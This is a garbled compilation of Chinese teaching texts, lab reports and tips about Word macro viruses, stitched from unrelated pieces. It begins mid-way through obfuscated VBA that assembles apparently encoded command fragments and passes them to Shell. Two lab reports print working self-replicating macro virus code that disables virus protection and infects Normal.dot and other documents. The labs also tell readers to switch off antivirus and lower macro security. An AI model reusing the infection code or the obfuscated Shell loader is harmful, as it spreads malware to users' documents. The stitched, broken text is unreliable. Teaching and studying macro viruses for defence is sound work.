Mid("RGKthsDsJzwtA5ADcAYgAxADAAMwBJADEAMAAxAHsANQA5AFkAMQAyADUAfgAxADIANQAnAC4AcwBQAEwAaQBUACgAIAAnAFkAJgB7AG0AOgBiACE8UDpdPzMzSYXt3P57", 13, 101)146 GzjkYUBnqXG = vajVOP147 JtQsEKnnw = DEvzqFPLp148 kEROiFMIq = Mid("j4Ja9dOW453qN2YADEAMAA5AEkZA0c3hwNX3JwzjtcQXbvF6aP", 16, 11)149 icAYwsLVpUA = kEROiFMIq150 kQQOJFDXZ = UddQropLw151 irUIcwRD = Mid("Au1EHs6ti0AmADUAOQB6ADMANgAmADEAMQA3AHsAMQAxADQA7Wj9C5z0PqNsb2IoN9LTqN", 11, 38)152 bapZdDJB = irUIcwRD153 kdaudlwYB = PtDFhmwZZ154 iFmWVaPu = Mid("AX2dCwbGzBwRzR0B9ACAAKQAtAEoATwBpAG4AJwAnACAAKQA=57cAXn5i8m8q2JvPWDXAo", 16, 34)155 KbFniuHlZAr = iFmWVaPu156 WujLpjlSJ = TnMGKiHih157 hfcbdZkXOQ = Mid("MofaM2kwYCF3hI3pREPq5wADEAWQA5ADkAhBAoZ3SX", 22, 13)158 OWGLMOBo = hfcbdZkXOQ159 OpniRlEni = VOwqRSPSQ160 zXXPDkaDCDf = Mid("UMBH8K03MAPWjNr4AA0AHsAMQAwADEAYgAxADAAOAB+ADEAMAA4AGIANQA5ACYAMwA2ACEAMQAxADkAegAxADAAMQBZADkAOAAmADkAOQB6ADEAMAA4AEkAMQAwADUAewAxADAAMQBZADEA 161 iCUMSYusIv = zXXPDkaDCDf162 OZouIKbdk = oJiYwCEkj163 pDDDLci = Mid("5l8w3MoVMQAxADQAOgA5ADcAegAxADEAMAArVwfzX20rok3a", 9, 27)164 NwSKajzAjmw = pDDDLci165 lrczHCBPD = NcVurrNsF166 cYFmodmUji = Mid("Xr8i8vwXK63tEGUAFM4fpIlA5ADcASQAxADEANgB7ADEAMAA1AGIAMQAwADEAIQAxADAANwBtADkANwBZADEAMQAwACYAMQAxADYASQAxADEAMQBiADEAMQAxAG0AMQAxADQAWQA5ADkAewAxADAA 167 kKRBFkTYOSq = cYFmodmUji168 tThcDoAPi = vzQtlhidb169 FPmzKLZZjn = Mid("UZV2SLzYBcmKjhjOAB7ADEAMAA2ADoAMQAuW61n", 16, 19)170 bYcfSuOhsf = FPmzKLZZjn171 nRRltsHOB = PtSrLGzLR172 KftEZiGv = Mid("ZOQB6ADEAMQA1AG0AOQGqcXPjVTGBVwHur", 2, 18)173 PcapUM = KftEZiGv174 CIoowrYFS = nUqoLNQZb175 CfjsS = Mid("pZPkhRPZtdoEjR3UWRwYAMQAxADIAWQAzADIAegA0ADMAegAzADIAbQAzADkASQA5ADIAegAzADkAIQAzADIAYgA0ADMAOgAzADIAJgAzADYAYgAxAoA", 21, 94)176 sbpNlLMLdC = CfjsS177 nHaoVpmlW = MEmKwaQjV178 haGppvzwpLm = Mid("MWhOm3Q1WQAxADEANgB+ADMAMgB7ADgAMwBJADEAMgAxAHsAMQAxADUASQAxADEANgB7v", 9, 59)179 wZkHuAqmza = haGppvzwpLm180Shell$ RTUHFOzsK + Chr(34) + iBSRmkhEj + XvLAfRK + PcapUM + EbUQjFzQMji + RkSMsXZmbbj + IAFUul + EzTYX + YhuVfBw + iCUMSYusIv + LJIEujI + AcOZjKGHd + bYcfSuOhsf + OWGLMOBo + wZkHuAqmza + kzLPNEjwRpi + 181End Function⼦程序中⾸先调⽤了"DMSojZquJ"模块的"KlsJVlijz"函数，函数代码经过严重混淆，但是通过函数结尾的“Shell”关键字我们猜测病毒执⾏了某个程序或命令⾏。

析在office中字处理的宏病毒病毒是针对微软公司的字处理软件word编写的一种病毒。

微软公司的字处理软件是目前最为流行的编辑软件。

由于宏病毒利用了word的文档机制进行传播，它和以往的病防治方法不同，一般情况下，人们大多注意可执行文件的病毒感染情况，而word宏病毒寄生于word的文档中，而且人们一般都要对文档文件进行备份，因此病毒可以隐藏很长一段时间。

病毒能跨越多种平台，并且针对数据文档进行破坏，因此具有极大的危害性，该病毒通过互联网相互进行文档传送时，迅速漫延，不到一周时间使机器全部染上病毒。

一、word工作原理word是一个功能很强大的字处理软件，流行于各种平台上，它不仅和windows其它软件有着天然的密切联系，而且它的文档机制是基于面向对象的文档机制建立的。

它提供了强大的word basic的编程能力，可以支持dee等多种windows的机制。

word还提供强大的功能——宏，宏是能组织到一起作为一独立的命令使用的一系列word命令，它能使日常工作变得更容易。

word 使用宏语言word basic。

word启动时，自动加载start up下模板及normal.dot模板，以及它们所包含的宏。

可以为宏指定特殊的名称，使其变为自动宏。

word可以识别以下名称的自动宏。

宏名运行条件autoexec 启动word时autonew 每次新建文档时autoopen 每次打开已有文档时autoclose 每次关闭文档时autoexit 退出word时宏病毒是一种特殊的宏。

它修改了这些自动宏，并附在文档中进行传播，下面通过对一个宏病毒说明其传染方式。

二、宏病毒的表现目前发现的几种主要宏病毒有：waiiu、concept、13号病毒(又称“台湾1号”病毒)。

13号病毒运行在中文word上，其发作时间为每月13号，用户打开文件时出一道四则运算题，往往这道题必须经过本机的word basic运算才能做对，而用计算器，或其它机器均有可能产生错误；如果答对，则进行宏病毒的问答，如“我是宏病毒，如何预防我，”答案是“不要看我。

word宏病毒课程设计一、课程目标知识目标：1. 学生理解Word宏病毒的定义、特征及其工作原理；2. 学生掌握如何识别Word文档中可能存在的宏病毒；3. 学生了解基本的宏病毒防护措施及处理方法。

技能目标：1. 学生能够运用Word软件的相关功能，查看并理解文档宏代码；2. 学生能够操作Word软件进行宏病毒的简单查杀与预防；3. 学生通过案例分析，提高解决问题的能力和信息处理能力。

情感态度价值观目标：1. 培养学生对计算机病毒防范的意识，增强信息安全保护观念；2. 激发学生对计算机编程的兴趣，提高其探究精神和创新意识；3. 培养学生良好的网络道德观念，遵循法律法规，尊重他人劳动成果。

课程性质：本课程为信息技术课程，旨在帮助学生掌握宏病毒相关知识，提高信息安全意识和技能。

学生特点：六年级学生已具备一定的计算机操作能力，对新鲜事物充满好奇，但信息安全意识较弱。

教学要求：结合学生特点，注重实践操作，以案例分析为主线，引导学生主动探究，培养其解决问题的能力。

在教学过程中，关注学生的情感态度价值观培养，使其成为具备良好网络素养的新时代少年。

1. Word宏病毒基础知识：- 宏病毒定义与特征；- 宏病毒的工作原理；- 宏病毒的危害及传播途径。

2. Word宏病毒识别与防护：- Word文档宏的查看与编辑；- 宏病毒识别技巧；- 宏病毒防护策略；- 疑似宏病毒文档的处理方法。

3. 实践操作与案例分析：- 实际操作演示宏病毒的查杀与防护；- 分析典型宏病毒案例，提高防范意识；- 学生动手实践，查杀模拟宏病毒。

4. 信息安全意识培养：- 介绍信息安全法律法规；- 培养良好的网络道德观念；- 探讨网络安全的重要性。

教学内容依据课程目标，结合教材相关章节进行组织。

在教学过程中，循序渐进地引导学生掌握宏病毒相关知识，注重实践操作和案例分析，以提高学生的实际操作能力和解决问题的能力。

同时，关注学生信息安全意识的培养，使其在学习过程中形成良好的网络素养。

XI`AN TECHNOLOGICAL UNIVERSITY 实验报告一．实验目的1.理解WORD宏病毒的感染方式2.理解WORD宏病毒的工作原理3.掌握WORD宏病毒的杀毒方法二．实验原理WORD的文件建立是通过模板来创建的，模板是为了形成最终文档而提供的特殊文档，模板可以包括以下几个元素：菜单、宏、格式(如备忘录)等。

模板是文本、图形和格式编排的蓝图，对于某一类型的所有文档来说，文本、图像和格式编排都是类似的。

WORD提供了几种常见文档类型的模板，如备忘录、报告和商务信件。

你可以直接使用模板来创建新文档，或者加以修改，也可以创建自己的模板。

一般情况下，WORD自动将新文档基于缺省的公用模板NORMAL.DOT。

由此可以看出，模板在建立整个文档中起的作用是作为基类，文档继承模板的属性，包括宏、菜单、格式等。

另外，WORD还提供强大的宏功能。

宏是能组织到一起作为一个独立命令使用的一系列WORD命令，它能使日常工作变得更容易。

在WORD启动时，会自动加载NORMAL.DOT模板，以及它们所包含的宏。

您可以为宏指定特殊的名称，使其变为自动宏，以便在执行某一操作时，如：启动WORD或打开文档，就自动执行具有特殊命名的宏。

同其他宏一样，你可以将自动宏定义在一个共用模板上，也可以将其定义在一个特定模板上。

宏病毒主要寄生在以下3个宏中：AUTOOPEN、AUTONEW、AUTOCLOSE。

带病毒文档打开时，将病毒传染给NORMAL.DOT公用模板中，再由公用模板传染给所有其它正常的文档。

二．MOTHERSDAYVIRUS病毒感染机制MOTHERSDAYVIRUS宏病毒感染WORD文档和NORMAL.DOT文档。

被感染的WORD文档打开时或关闭时会首先弹出一个对话框，对话框关闭后再将控制权转移给正常的WORD文档执行。

MOTHERSDAYVIRUS使用DOCUMENT_OPEN宏（文档打开时执行）感染NORMAL.DOT，使用AUTOCLOSE自动宏感染其它文档。

教你管理Office Word“宏病毒” 电脑资料现在很多朋友在写作文档时喜欢到网上下载各种模板简化自己的工作，教你管理Office Word“宏病毒” 。

不过网络模板中有一些“害群之马”可不是为方便大家而产生的，它们携带着宏病毒。

宏病毒寄生在模板或者文档中，当大家运行文档或者模板后就会激活病毒从而危害电脑。

不过也不用过分担忧，我们用下面的方法就可以让宏病毒永远远离我们的电脑。

验证：通过保存类型，巧妙鉴别宏病毒如何检查Word是否感染了宏病毒？其实检查的方法很简单。

翻开需要检查的文档，单击“文件”菜单栏，选择“另存为”命令，如果对话框中的保存类型固定为“文档模板”，那么表示这个文件已经感染了宏病毒，需要用杀毒软件进行清理了。

小提示：当然，你直接用杀毒软件来扫描一下这个文档也未尝不可，毕竟现在不装杀毒软件的用户还是少数啊。

拒绝：设置文档为“只读”属性，让病毒吃闭门羹因为宏病毒在word中寄居的文件就是no rmal.dot，所以预防宏病毒的方法其实也很简单，只要把没有感染宏病毒的normal.dot文件的属性设置为只读，这样宏病毒就不能寄居到normal.dot中，就能起到预防宏病毒的效果了，电脑资料《教你管理office word“宏病毒”》( s:// )。

小提示：虽然把一些内容固定的文件设置为具有只读属性，是防止病毒侵入的方法之一，但这也不是万能的，如果病毒制造者注意到这一点，在侵入前先修改你的文件属性，去掉只读属性，那对他们来说也是小菜一碟。

查杀：查杀，统统赶走宏病毒宏病毒是通过Word中的宏语言（一种类似VB的语言）编写的，易于传播而且危害巨大，常常能将你花了很多时编写的文档瞬间“吃掉”，下面介绍使用手工的方法杀掉宏病毒。

单击“工具”菜单栏，选择“宏”，单击“宏”命令（或者使用组合键“Alt＋F8”）调出宏对话框，如果在弹出的对话框中有已经记录的宏的话，那就极有可能是宏病毒，删除所有的宏就可以了。

实验四Word宏病毒试验专业班级学号姓名实验学时实验类型实验地点实验时间指导老师高虎实验成绩年月日一实验目的1. 演示宏的编写2. 说明宏的原理及其安全漏洞和缺陷3. 理解宏病毒的作用机制二实验环境Windows 系列操作系统Word2003 应用程序实验素材：experments 目录下的macro 目录的macro_1.txt。

三实验步骤1.软件设置：关闭杀毒软件的自动防护功能。

2.打开Word 2003，在工具 宏 安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic 项目的访问。

3.自我复制功能演示。

一个word 文档，然后按Alt+F11 调用宏编写窗口（工VisualBasic 宏编辑器），在左侧的project—>Microsoft Word 对象 ThisDocument中输入源代码（参见源代码一或者从光盘上拷贝，位置为：“光盘盘符:\Experiment\macro\macro_1.txt‖），保存。

此时当前word 文档就含有宏病毒，只要下次打开这个word 文档，就会执行以上代码，并将自身复制到Normal.dot（word 文档的公共模板）和当前文档的ThisDocument 中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open）。

此时所有的word 文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word 的正常使用，本例中只是简单的跳出一个提示框。

4. 清除宏病毒对每一个受感染的Word 文档进行如下操作：打开受感染的Word 文档，进入宏编辑环境（按Alt+F11 键），打开Normal|MicrosoftWord 对象|This Document，清除其中的病毒代码（只要删除所有内容即可）。

然后打开Project|Microsoft Word|This Document，清除其中的病毒代码。

宏病毒实验报告201424010257 邹文敏一、实验目的通过运行计算机代码，更加深刻的理解计算机代码。

对计算机代码有一个初步的认识。

加深对宏病毒的感性认识，宏病毒是感染数据文件word,office等。

二、实验内容运行自我复制，感染word公用模板和当前文档；具有一定破坏性的宏；清除宏病毒。

三、实验步骤实验一：●将word文档中的开发者工具打开；word 中心→信任选项→宏设计将信任选项打开●运行第一个实验Visual Basic →normal →Microsoft→the documentProject→microsoft word对象→the document复制如下代码：'APMPPrivate Sub Document_Open()On Error Resume NextApplication.DisplayStatusBar = FalseOptions.VirusProtection = FalseOptions.SaveNormalPrompt = False '以上都是基本的自我隐藏措施MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate Then _Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule With HostIf .Lines(1, 1) <> "'APMP" Then '判断感染标志.DeleteLines 1, .CountOfLines '删除目标文件所有代码.InsertLines 1, MyCode '向目标文档写入病毒代码If ThisDocument = NormalTemplate Then _ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd WithMsgBox "Basic class macro by jackie", vbOKOnly, "APMP"End Sub保存时注意保存为宏文件实验一运行截图：清除实验一中的内容只需要删除，the document 中的内容在保存即可。

计算机病毒实验报告实验3.2 台湾No.1宏病毒3.2 台湾No.1宏病毒3.2.1 实验目的了解台湾No.1宏病毒的基本概念实验自己的台湾No.1宏病毒3.2.2 实验原理台湾No.1宏病毒实际上是一个含有恶意代码的Word自动宏，其代码主要是造成恶作剧，并且有可能使用户计算机因为使用资源枯竭而瘫痪。

3.2.3 实验预备知识点】什么是Word宏对VBA语言有一定的了解3.2.4 实验环境操作系统：WINDOWS2000JDK版本：Java Standard Edition 1.4.0以上数据库：MysqlWeb服务器:TomacatOffice版本:MS office2000/20033.2.5 实验步骤打开“信息安全综合实验系统” 在右上角选择“实验导航”双击“病毒教学实验系统”进入病毒教学实验系统登录面界，输入用户名和密码。

（注意：实验前先关闭所有杀毒软件。

）1.病毒感染实验由于该病毒特征码明显，因此请首先将病毒防火墙关闭，将系统时间调整到13日。

进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“病毒感染实验”，要根据要求和提示操作配置客户端的邮件地址，如下图3-2-1所示。

根据提示下载提供的台湾No.1病毒，亲自运行并记录自己的实验报告。

图3-2-1 病毒样本下载页面2.病毒代码分析进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“病毒代码分析”，可以分析页面中的台湾No.1病毒源代码，根据相关代码分析，填写页面中空白的参数，点击确定系统将自动生成代码。

新建一个word文档作为自己编写的该病毒文件，然后把生成的代码复制并粘帖至Word自带的VBA编译工具中，可以参照美丽莎宏病毒实验中的图4-3至4-4 。

将自行编制的病毒备份待用。

3.杀毒实验进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“杀毒实验”，学习病毒防范方法，根据系统页面上的提示，使用手动杀毒，并写入实验报告中。

宏与宏病毒实验1.宏病毒介绍宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。

从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

如果某个文档中包含了宏病毒，我们称此文档感染了宏病毒；如果 WORD系统中的模板包含了宏病毒，我们称WORD系统感染了宏病毒。

所谓宏是将一系列word命令和指令组合起来，形成一个命令，实现任务执行的自动化。

在word中有一类很实用的自动宏，会在特定事件发生时自动运行，word提供的5个自动宏是：(1) Autoexec宏在启动word时自动运行；(2) Autoexit宏在退出word时自动运行；(3) Autonew宏在新建文档时自动运行；(4) Autoopen宏在打开文档时自动运行；(5) Autoclose宏在关闭文档时自动运行；2.实验环境实验环境：windows2000及以上或windows XP所需软件：office word3.实验步骤(1)首先，依次选择“工具”-“宏”-“录制宏”菜单命令，接着弹出“录制宏”界面，如下图：接着在“宏名”下面的输入框中输入新宏的名称“yuan ”，接着单击“键盘”图标。

在弹出的“自定义键盘”界面中指定快捷键，比如ctrl+y ，单击左下角“指定”按钮后，再单击右下角的“关闭”按钮，回到”录制宏“界面。

这时单击”确定“按钮启动记录器。

接着，依次选择“插入“-”符号“菜单命令，弹出”符号“界面。

选择”符号“选项卡，在”符号“框中选择”￥“，单击”插入“按钮后再单击”关闭“按钮。

单击“停止录制“工具栏中的”停止录制“按钮。

以后，当需要插入字符“￥”的时候，只需要按下ctrl+y组合键。

(2) 给word文档加上通用的密码关闭word文档，当再次打开文档的时候，需要输入密码才能看到内容和修改。

实验五类TaiWan NO.1病毒实验1.实验目的Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。

本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。

2.实验所需条件和环境硬件设备：局域网，终端PC机。

系统软件：Windows系列操作系统支撑软件：Word 2003软件设置：关闭杀毒软；打开Word 2003，在工具→宏→安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问实验环境配置如下图所示：受感染终端被感染终端宏病毒传播示意图3.实验内容和分析为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。

3.1. 例1 自我复制，感染word公用模板和当前文档代码如下：'Micro-VirusSub Document_Open()On Error Resume NextApplication.DisplayStatusBar = FalseOptions.SaveNormalPrompt = FalseOurcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate ThenSet Host = ActiveDocument.VBProject.VBComponents(1).CodeModuleEnd IfWith HostIf .Lines(1.1) <> "'Micro-Virus" Then.DeleteLines 1, .CountOfLines.InsertLines 1, Ourcode.ReplaceLine 2, "Sub Document_Close()"If ThisDocument = nomaltemplate Then.ReplaceLine 2, "Sub Document_Open()"ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd IfEnd WithMsgBox "MicroVirus by Content Security Lab"End Sub打开一个word文档，然后按Alt+F11调用宏编写窗口（工具→宏→Visual Basic→宏编辑器）,在左侧的project—>Microsoft Word对象→ThisDocument中输入以上代码，保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。